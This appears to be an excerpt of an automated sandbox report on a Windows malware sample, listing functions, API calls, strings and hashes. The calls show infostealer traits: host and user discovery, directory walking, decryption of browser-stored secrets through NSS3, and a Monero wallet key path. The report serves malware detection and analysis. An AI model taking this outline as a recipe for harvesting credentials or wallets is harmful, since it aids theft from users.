Opcode Fuzzy Hash: 9a8d5eb6a9ae23538b15eece6cfe478ca32eb6a3ba1a9dee761cf5540cfa8997
Instruction Fuzzy Hash: C5E0127194034C6BDB55EB50CC96FAD737C9B44B01F004295BA0C5B1C0DE70AB898B91

Function 00BE1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00BF78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BF7910
Part of subcall function 00BF78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00BF7917
Part of subcall function 00BF78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00BF792F

Part of subcall function 00BF7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00BE11B7), ref: 00BF7880
Part of subcall function 00BF7850: RtlAllocateHeap.NTDLL(00000000), ref: 00BF7887
Part of subcall function 00BF7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00BF789F

ExitProcess.KERNEL32 ref: 00BE11C6

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateName$ComputerExitUser
String ID:
API String ID: 3550813701-0
Opcode ID: fa8b95954369f1ad304ddb780fc0ba377ad4004180618a705e4410e8677077ec
Instruction ID: c8a92416889e5c216db60edfbbff8d17ad00825e4684e9c292f50f0bc8d5665c
Opcode Fuzzy Hash: fa8b95954369f1ad304ddb780fc0ba377ad4004180618a705e4410e8677077ec
Instruction Fuzzy Hash: B2E012B595430957CE1477B7AC0AB3A32DC9B14385F1C08B9FB05E3202FF39E829856A

Non-executed Functions

Function 00BF38B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00BF38CC
FindFirstFileA.KERNEL32(?,?), ref: 00BF38E3
lstrcat.KERNEL32(?,?), ref: 00BF3935
StrCmpCA.SHLWAPI(?,00C00F70), ref: 00BF3947
StrCmpCA.SHLWAPI(?,00C00F74), ref: 00BF395D
FindNextFileA.KERNEL32(000000FF,?), ref: 00BF3C67
FindClose.KERNEL32(000000FF), ref: 00BF3C7C

Strings

%s\*, xrefs: 00BF38C0
%s\%s\%s, xrefs: 00BF3A4A
%s\%s, xrefs: 00BF3A6F
%s%s, xrefs: 00BF3AAD
%s\%s, xrefs: 00BF397A

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
API String ID: 1125553467-2524465048
Opcode ID: 078ac0570a7390a1e3a11885c4a41d40c65ae4679eba051ffdbdb0d3f0a16df5
Instruction ID: d6150970a3b7ab5dce7b40b5cd07fac6dc17f74800472fc30479aed30ac7dbb9
Opcode Fuzzy Hash: 078ac0570a7390a1e3a11885c4a41d40c65ae4679eba051ffdbdb0d3f0a16df5
Instruction Fuzzy Hash: 34A11DB19002089FDB34DBA5DC85FFA73B8BB58700F084598A609A7141EB759B89CF62

Function 00BF4570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00BF4580
RtlAllocateHeap.NTDLL(00000000), ref: 00BF4587
wsprintfA.USER32 ref: 00BF45A6
FindFirstFileA.KERNEL32(?,?), ref: 00BF45BD
StrCmpCA.SHLWAPI(?,00C00FC4), ref: 00BF45EB
StrCmpCA.SHLWAPI(?,00C00FC8), ref: 00BF4601
FindNextFileA.KERNEL32(000000FF,?), ref: 00BF468B
FindClose.KERNEL32(000000FF), ref: 00BF46A0
lstrcat.KERNEL32(?,0173EB28), ref: 00BF46C5
lstrcat.KERNEL32(?,0173D990), ref: 00BF46D8
lstrlen.KERNEL32(?), ref: 00BF46E5
lstrlen.KERNEL32(?), ref: 00BF46F6

Strings

%s\*, xrefs: 00BF459A
%s\%s, xrefs: 00BF461B

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
String ID: %s\%s$%s\*
API String ID: 671575355-2848263008
Opcode ID: 4c80cf7bac96605a8a916f0df903031d5c1e56212ab17446098f9718ea6b5d6e
Instruction ID: ab245f80ba52ff99a044c42b892c78cb8a9c08068c93c5b023b52a85ffbdf729
Opcode Fuzzy Hash: 4c80cf7bac96605a8a916f0df903031d5c1e56212ab17446098f9718ea6b5d6e
Instruction Fuzzy Hash: B95133B154021CAFCB24EB75DC89FFE73BCAB58300F4445D9B609A6190EB749B898F91

Function 00BEED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00BEED3E
FindFirstFileA.KERNEL32(?,?), ref: 00BEED55
StrCmpCA.SHLWAPI(?,00C01538), ref: 00BEEDAB
StrCmpCA.SHLWAPI(?,00C0153C), ref: 00BEEDC1
FindNextFileA.KERNEL32(000000FF,?), ref: 00BEF2AE
FindClose.KERNEL32(000000FF), ref: 00BEF2C3

Strings

%s\*.*, xrefs: 00BEED32

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\*.*
API String ID: 180737720-1013718255
Opcode ID: 6e51db31405d469d5d7e5ca3847bc1031622433999c9ea84761bcd0a477753b3
Instruction ID: cd447338496f49b33e0c461638b68dac4b36a2a869a94210b223366c281aa7a7
Opcode Fuzzy Hash: 6e51db31405d469d5d7e5ca3847bc1031622433999c9ea84761bcd0a477753b3
Instruction Fuzzy Hash: 24E1CFB191111C9ADB58EB64CC51EFEB3B8AF54340F4041E9B60A63092EF706B8ECF51

Function 00BEDE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788

Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,01739040,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12

Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00C00C2E), ref: 00BEDE5E
StrCmpCA.SHLWAPI(?,00C014C8), ref: 00BEDEAE
StrCmpCA.SHLWAPI(?,00C014CC), ref: 00BEDEC4
FindNextFileA.KERNEL32(000000FF,?), ref: 00BEE3E0
FindClose.KERNEL32(000000FF), ref: 00BEE3F2

Strings

\*.*, xrefs: 00BEDE26

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
String ID: \*.*
API String ID: 2325840235-1173974218
Opcode ID: 71ba3af6f575716b4f666b9d9fef26bbec75e1259c7eea3d03bb8807d348bca5
Instruction ID: dee21f00c2a38d545e9e53c52488166d48613556bdc8f9155e41d69be9d3b523
Opcode Fuzzy Hash: 71ba3af6f575716b4f666b9d9fef26bbec75e1259c7eea3d03bb8807d348bca5
Instruction Fuzzy Hash: 75F18EB181411D9ADB29EB64CC95EFEB3B8AF14340F5041E9A61E63091EF706B4ECF51

Function 00BEC820 Relevance: 13.6, APIs: 9, Instructions: 95stringencryptionCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00BEC871
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00BEC87C
PK11_GetInternalKeySlot.NSS3 ref: 00BEC88A
PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 00BEC8A5
PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 00BEC8EB
lstrcat.KERNEL32(?,00C00B46), ref: 00BEC943
lstrcat.KERNEL32(?,00C00B47), ref: 00BEC957
PK11_FreeSlot.NSS3(?), ref: 00BEC961
lstrcat.KERNEL32(?,00C00B4E), ref: 00BEC978

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: K11_lstrcat$Slot$AuthenticateBinaryCryptDecryptFreeInternalStringlstrlen
String ID:
API String ID: 3356303513-0
Opcode ID: 00cf69493a2103543b8d3299c36a895c1c4b20a464dec5b78163cd92af453c36
Instruction ID: 8c274b4e295db45d961f2f6d512ec1a9afef113d40137768b01dc511fa1c832e
Opcode Fuzzy Hash: 00cf69493a2103543b8d3299c36a895c1c4b20a464dec5b78163cd92af453c36
Instruction Fuzzy Hash: 1A41627990421ADFDB20DFA4DD89BFEB7B8BB44304F1441B8E509A7280D7745A85CF91

Function 00FBB7AE Relevance: 12.9, Strings: 9, Instructions: 1678COMMON

Download Yara Rule

Strings

[ts, xrefs: 00FBBF8E
mjM, xrefs: 00FBBC1E
3b{, xrefs: 00FBBA40
,}o, xrefs: 00FBC20F
8MYw, xrefs: 00FBB7DB
usw[, xrefs: 00FBB885
J ^, xrefs: 00FBC533
'o;, xrefs: 00FBCB56
S&j, xrefs: 00FBBEC6

Memory Dump Source

Source File: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 'o;$,}o$3b{$8MYw$J ^$S&j$[ts$mjM$usw[
API String ID: 0-3907707192
Opcode ID: e20013714c45146f5b8999b592be70840bc14a6a2969ffe5bdbd3469338be406
Instruction ID: dd7555bd894b15354c704524c9c8a9e57fbb004de363fd1fadbbd38cdf63888b
Opcode Fuzzy Hash: e20013714c45146f5b8999b592be70840bc14a6a2969ffe5bdbd3469338be406
Instruction Fuzzy Hash: 26B209F36086049FE304AE2EDC8567AFBE9EFD4720F1A453DEAC4C7744EA3558058692

